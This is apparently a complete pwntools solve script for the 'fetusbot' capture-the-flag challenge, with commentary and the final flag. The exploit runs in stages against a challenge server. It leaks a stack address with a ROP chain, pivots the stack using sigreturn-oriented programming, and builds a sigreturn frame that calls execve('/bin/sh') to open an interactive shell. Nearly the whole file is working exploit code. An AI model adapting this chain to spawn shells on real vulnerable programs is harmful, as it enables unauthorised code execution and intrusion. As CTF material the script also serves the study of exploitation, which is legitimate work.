fetusbot solvescript
from pwn import context, ELF, args, process, gdb, remote, p8, u64, flat, p64, tube, p16, p32, asm, FileStructure, SigreturnFrame
import time
import os
# Challenge binary, resolved relative to the working directory.
binary_path: str = "./fetusbot"

# pwntools helpers (p64/u64, SigreturnFrame, asm) key their layout off this.
context.arch = "amd64"

# gdbscript handed to gdb.debug() in GDB mode.  Both commands are commented
# out, so gdb starts with no breakpoints; the 0x8048000 address is a 32-bit-era
# leftover and does not match the 0x1337xxx gadgets used below.
gs: str = "\n# break * 0x8048000\n# continue\n"
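def start() -> tube:
    """Launch the target as selected by pwntools' command-line ``args``.

    ``REMOTE`` connects to the challenge server, ``GDB`` starts the binary
    under gdb with the ``gs`` script, and the default is a plain local
    process.  ``DEBUG`` additionally turns on pwntools' byte-level logging in
    every mode.

    Returns:
        A pwntools tube (``remote`` or ``process``) ready for I/O.
    """
    if args.DEBUG:
        context.log_level = "DEBUG"
    if args.REMOTE:
        # The handout line was `nc 0.cloud.chals.io 20922`, but the script
        # connects to 26925 — keep whichever is current in sync here.
        return remote("0.cloud.chals.io", 26925)
        # Local docker alternative: remote("localhost", 2000)
    if args.GDB:
        context.terminal = ["kitty", "@", "launch", "--location", "before"]
        # Forward the Nix debug-info path only when it is actually set.  The
        # original passed os.getenv() straight through, which hands pwntools
        # a None value whenever the variable is unset — likely rejected when
        # the env dict is encoded.  None as the whole env means "inherit".
        nix_debug_dirs = os.getenv("NIX_DEBUG_INFO_DIRS")
        debug_env = (
            None
            if nix_debug_dirs is None
            else {"NIX_DEBUG_INFO_DIRS": nix_debug_dirs}
        )
        return gdb.debug([binary_path], gdbscript=gs, env=debug_env)
    return process([binary_path])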
def breakpoint(io, msg=None):
    """Print a marker line to the console when running in GDB mode.

    Only a marker is printed — nothing pauses the tube or the debuggee; set
    real breakpoints in ``gs`` or in gdb itself.  Outside GDB mode this is a
    no-op.  Note: the name shadows the builtin ``breakpoint()`` and ``io`` is
    accepted for call-site symmetry but never used.
    """
    if not args.GDB:
        return
    marker = "*** BREAKPOINT ***" if msg is None else f"*** BREAKPOINT {msg} *** "
    print(marker)
# ROP gadgets.  All four sit in the same 0x1337000 page, which suggests the
# binary is loaded at a fixed address (check with checksec).  The names record
# the instruction sequence the original author found at each address; they are
# not re-verified by this script.
XOR_EAX: int = 0x133700a      # zeroes eax -> rax == 0 == SYS_read
MOV_RDI_RSP: int = 0x13370b8  # mov rdi, rsp ; ...
ENTRY: int = 0x13370bc        # program entry, used to restart after the leak
SYSCALL_RET: int = 0x13370c3  # syscall ; ret
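io = start()

# Stage 0 — leak a stack address.
# The first overflow sends five qwords.  Read alongside the gadget names:
# eax is zeroed, the first `syscall; ret` therefore performs a read, and the
# byte count it returns becomes rax for the second `syscall; ret`.  After the
# pause, sendline() delivers exactly one byte, so that read returns 1 ==
# SYS_write and the second syscall writes memory back to us; the chain then
# re-enters the binary so the leak can be used on the next pass.  (Inferred
# from byte counts and gadget names — verify against the binary.)
io.send(
    flat(
        {
            0x00: p64(XOR_EAX),
            0x08: p64(SYSCALL_RET),
            0x10: p64(SYSCALL_RET),
            0x18: p64(XOR_EAX),
            0x20: p64(ENTRY),
        }
    )
)
time.sleep(1)
io.sendline()

# The leaked output carries a stack pointer at bytes LEAK_START..LEAK_END.
# Fail with a readable error if fewer bytes came back instead of letting u64()
# choke on a short slice; on a slow remote a longer io.clean(timeout=...) is
# the usual remedy.
LEAK_START, LEAK_END = 0x78, 0x80
leaks = io.clean()
if len(leaks) < LEAK_END:
    raise RuntimeError(
        f"stack leak too short: got {len(leaks)} bytes, need at least {LEAK_END:#x}"
    )
stack_leak = u64(leaks[LEAK_START:LEAK_END])
print(f"STACK: {hex(stack_leak)}")

# Scratch area for the pivot: one page below the leaked pointer, with a 0x36
# correction that comes from the original solve (not derivable from this file).
LOCATION = stack_leak + 0x36 - 0x1000

# Both SROP stages share one shape: four gadgets followed by a sigreturn frame
# cut at FRAME_BYTES.  Why the frame is truncated rather than sent whole is not
# visible here — presumably the victim's read() buffer is that large.
FRAME_BYTES = 0xda
SIGRETURN_TRIGGER_LEN = 0xf  # == rt_sigreturn's syscall number on x86-64


def _srop_chain(frame: SigreturnFrame) -> bytes:
    """Return gadgets + truncated frame for one SROP stage.

    Execution order once the chain is on the stack: zero eax; `syscall; ret`
    (a read whose byte count lands in rax); `mov rdi, rsp`; `syscall; ret`
    again, which is rt_sigreturn once rax has been steered to 0xf by
    ``_trigger_sigreturn``.  At that point rsp points at the 0x20 offset of the
    chain, i.e. exactly at ``frame``, and the CPU state becomes whatever the
    frame says (rdi included, so the mov's effect on rdi is immaterial).
    """
    return (
        p64(XOR_EAX)
        + p64(SYSCALL_RET)
        + p64(MOV_RDI_RSP)
        + p64(SYSCALL_RET)
        + bytes(frame)[:FRAME_BYTES]
    )


def _trigger_sigreturn(io: tube) -> None:
    """Make the pending read() return 0xf so the following syscall is rt_sigreturn.

    flat() pads the gap before offset 0xe with filler, so exactly 15 bytes are
    sent.  Only the length matters; the content is discarded by the chain.
    """
    payload = flat({0xe: p8(1)})
    if len(payload) != SIGRETURN_TRIGGER_LEN:
        raise RuntimeError(f"sigreturn trigger is {len(payload)} bytes, expected 0xf")
    io.send(payload)


# Stage 1 — pivot.  sigreturn loads these registers, then rip=SYSCALL_RET
# performs read(0, LOCATION, 0x1000).  Because rsp == LOCATION as well, the
# `ret` after that syscall pops the first gadget of the chain the read just
# fetched, so the next stage runs from our scratch area.
stack_pivot_frame = SigreturnFrame()
stack_pivot_frame.rsp = LOCATION
stack_pivot_frame.rip = SYSCALL_RET
stack_pivot_frame.rdi = 0          # fd 0 (stdin)
stack_pivot_frame.rsi = LOCATION   # destination buffer == new stack
stack_pivot_frame.rdx = 0x1000
stack_pivot_frame.rax = 0          # SYS_read
io.send(_srop_chain(stack_pivot_frame))
_trigger_sigreturn(io)
time.sleep(1)

# Stage 2 — execve("/bin/sh", NULL, NULL).
# "/bin/sh\0" rides in the frame's rcx slot.  With the 0x20-byte gadget prefix
# in front of the frame, that slot lands 0xb8 bytes into the chain, which is
# now at LOCATION — hence rdi = LOCATION + 0xb8.
exec_frame = SigreturnFrame()
exec_frame.rsp = LOCATION
exec_frame.rip = SYSCALL_RET
exec_frame.rdi = LOCATION + 0xb8   # -> the rcx slot below
exec_frame.rsi = 0x0               # argv = NULL
exec_frame.rdx = 0x0               # envp = NULL
exec_frame.rax = 0x3b              # SYS_execve
exec_frame.rcx = u64(b"/bin/sh\0")  # path string parked in a register slot
io.send(_srop_chain(exec_frame))
_trigger_sigreturn(io)

io.interactive()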
# brck{Th4ts_A_h34ltHy_R1ght_0cc1put_P0st3r10r}